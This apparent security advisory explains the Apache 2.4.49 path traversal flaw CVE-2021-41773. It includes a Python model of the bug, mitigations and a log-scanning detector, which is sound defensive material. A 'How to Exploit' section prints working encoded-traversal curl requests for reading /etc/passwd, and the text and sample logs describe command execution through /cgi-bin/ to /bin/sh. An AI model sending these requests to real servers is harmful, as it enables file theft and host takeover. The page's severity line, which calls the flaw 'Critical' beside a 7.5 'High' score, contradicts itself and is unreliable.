How the mentioned CVE works:
Apache HTTP Server 2.4.49 changed its path normalization routine, and that change introduced CVE-2021-41773. The routine checks each path segment for `.` and `..` before it percent-decodes the segment, and only decodes while copying the segment into the normalized path. An encoded segment such as `.%2e` or `%2e%2e` therefore passes the dot-segment check and still becomes `..` in the output, so a crafted request can traverse out of a directory that an `Alias` or `ScriptAlias` maps to a location outside the document root. If the traversed filesystem locations are not protected by a `Require all denied` directive (the stock httpd.conf denies `/` and grants only the document root, so exploitation needs a configuration that grants access more broadly), the request maps to unintended directories and arbitrary files on the server can be read. If mod_cgi or mod_cgid is also enabled, the same traversal through the `/cgi-bin/` alias can reach an executable such as `/bin/sh`, which the CGI module runs with the request body as its standard input, giving the attacker command execution on the underlying host with the privileges of the web server process.
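The ordering problem described above, reduced to a small model (an added example written for this page, not Apache's own `ap_normalize_path()`; the `/cgi-bin/` to `/usr/lib/cgi-bin/` alias and the `/var/www/html` document root are assumed Debian-style values, not taken from the post):

```python
"""Model of the CVE-2021-41773 normalization defect: dot-segment checks run on the
raw (still percent-encoded) segment, and decoding happens afterwards.

Added illustration for this page, not Apache's ap_normalize_path(); it keeps only
the ordering that matters.  Alias and docroot values are assumed Debian-style
defaults, not taken from the page.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed mapping for illustration: a ScriptAlias that lives outside the docroot.
ALIAS_PREFIX = "/cgi-bin/"
ALIAS_TARGET = "/usr/lib/cgi-bin/"
DOCROOT = "/var/www/html"


def normalize_vulnerable(path: str) -> Optional[str]:
    """2.4.49-style ordering: classify the segment first, decode while copying."""
    out = []
    for raw in path.split("/"):
        if raw in ("", "."):          # "//" and "/./" are dropped
            continue
        if raw == "..":               # a *literal* ".." is handled correctly
            if not out:
                return None           # would climb above the root: reject
            out.pop()
            continue
        # Every other segment is copied, and %XX is decoded during the copy.
        # ".%2e" and "%2e%2e" therefore reach the output as "..", but they were
        # never treated as a dot-segment, so nothing was popped or rejected.
        out.append(unquote(raw))
    return "/" + "/".join(out)


def normalize_fixed(path: str) -> Optional[str]:
    """Corrected ordering: decode the segment, then classify it."""
    out = []
    for raw in path.split("/"):
        seg = unquote(raw)
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                return None           # encoded or not, climbing above root is rejected
            out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def resolve_on_disk(normalized: str) -> str:
    """Map the normalized URL path to a filesystem path the way an Alias would,
    then let the filesystem collapse any ".." that survived normalization."""
    if normalized.startswith(ALIAS_PREFIX):
        fs_path = ALIAS_TARGET + normalized[len(ALIAS_PREFIX):]
    else:
        fs_path = DOCROOT + normalized
    return posixpath.normpath(fs_path)


if __name__ == "__main__":
    probe = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
    vuln = normalize_vulnerable(probe)
    print("2.4.49 :", vuln, "->", resolve_on_disk(vuln))
    print("fixed  :", normalize_fixed(probe))
```

The vulnerable normalizer hands `/cgi-bin/../../../../etc/passwd` to the alias mapping, and the kernel resolves that to `/etc/passwd`; the corrected ordering sees the same request as four `..` segments climbing above the root and rejects it, which is the 400 response a patched server returns.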
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical (NVD CVSS v3.1 base score 7.5, High)
Date: 2021-10-05
Patch status: released (2021-10-05)
What Undercode Says:
`curl -H "Content-Type: application/json" -X GET "http://api.cvedetails.com/json-feed.php?cveid=CVE-2021-41773"` (pull the advisory record)
`grep -r "Alias" /etc/apache2/sites-enabled/` (list Alias/ScriptAlias mappings; each one that points outside the document root is a traversal entry point)
`find /var/www -name "*.cgi" -type f` (inventory CGI scripts; mod_cgi plus the traversal is the RCE path)
`cat /etc/passwd` (the file the probes below are expected to disclose; compare it against the response body)
How to Exploit:
`curl --path-as-is "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"`
`curl --path-as-is "http://target.com/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"`
(`--path-as-is` stops curl itself from collapsing dot segments before the request leaves the client; a 200 with the file contents confirms the traversal, a 400 indicates a patched or correctly configured server.)
Protection from this CVE:
Immediate upgrade to 2.4.50. Note that the 2.4.50 fix was itself incomplete (CVE-2021-42013); upgrade to 2.4.51 or later.
Configure `Require all denied` on the filesystem root and grant access only to the directories that must be served.
Disable unused CGI scripts, and mod_cgi/mod_cgid altogether if CGI is not needed.
Implement strict WAF rules.
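Detection for the requests shown under "How to Exploit", as an added example that is not from the original post: it parses Apache combined-format access log lines (the sample lines are constructed for this demonstration) and flags a `..` segment that appears only after percent-decoding, which a literal `../` filter or WAF rule would miss.

```python
"""Flag CVE-2021-41773-style requests in an Apache access log (combined format).

Added example for this page, not part of the original post.  The log lines in
SAMPLE_LOG are constructed for the demonstration, not captured from a real host.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Combined log format: ip ident user [time] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)

SAMPLE_LOG = """\
203.0.113.5 - - [05/Oct/2021:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Oct/2021:10:02:31 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1855 "-" "curl/7.79.1"
203.0.113.9 - - [05/Oct/2021:10:02:40 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 71 "-" "curl/7.79.1"
198.51.100.2 - - [05/Oct/2021:10:03:02 +0000] "GET /icons/../../etc/passwd HTTP/1.1" 400 226 "-" "python-requests/2.26.0"
198.51.100.7 - - [05/Oct/2021:10:04:15 +0000] "GET /docs/release..notes.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def classify(path: str) -> Optional[Dict[str, bool]]:
    """Return traversal indicators for a request path, or None if it is clean.

    The check is done per segment after one round of percent-decoding, which is
    the view the patched normalizer takes; a ".." inside a file name
    (release..notes.html) is not a traversal and is not flagged.
    """
    raw_segments = path.split("?", 1)[0].split("/")
    decoded = [unquote(s) for s in raw_segments]
    if ".." not in decoded:
        return None
    return {
        # ".." appeared only after decoding: the encoded form the CVE relies on
        "encoded": any(d == ".." and r != ".." for r, d in zip(raw_segments, decoded)),
        # traversal through the CGI alias is the RCE path
        "cgi": raw_segments[1:2] == ["cgi-bin"],
    }


def scan(log_text: str) -> List[dict]:
    """Parse each line, classify the path and attach a severity label."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m["path"])
        if verdict is None:
            continue
        if verdict["cgi"] and m["method"] == "POST":
            severity = "rce-attempt"        # POST body becomes stdin of the target binary
        elif verdict["encoded"]:
            severity = "encoded-traversal"  # the 2.4.49 bypass
        else:
            severity = "plain-dotdot"       # rejected by every version, still worth noting
        hits.append({
            "ip": m["ip"], "method": m["method"], "path": m["path"],
            "status": int(m["status"]), "severity": severity,
            # a 2xx on a traversal path is the strongest sign the host was vulnerable
            "likely_success": m["status"].startswith("2"),
        })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Run it against a real log with `scan(open("/var/log/apache2/access.log").read())`; anything labelled `rce-attempt` or `encoded-traversal` with `likely_success` set deserves a forensic look at the host, not just a blocklist entry for the source IP.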
Impact:
Arbitrary file disclosure.
Remote Code Execution.
Complete system compromise.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode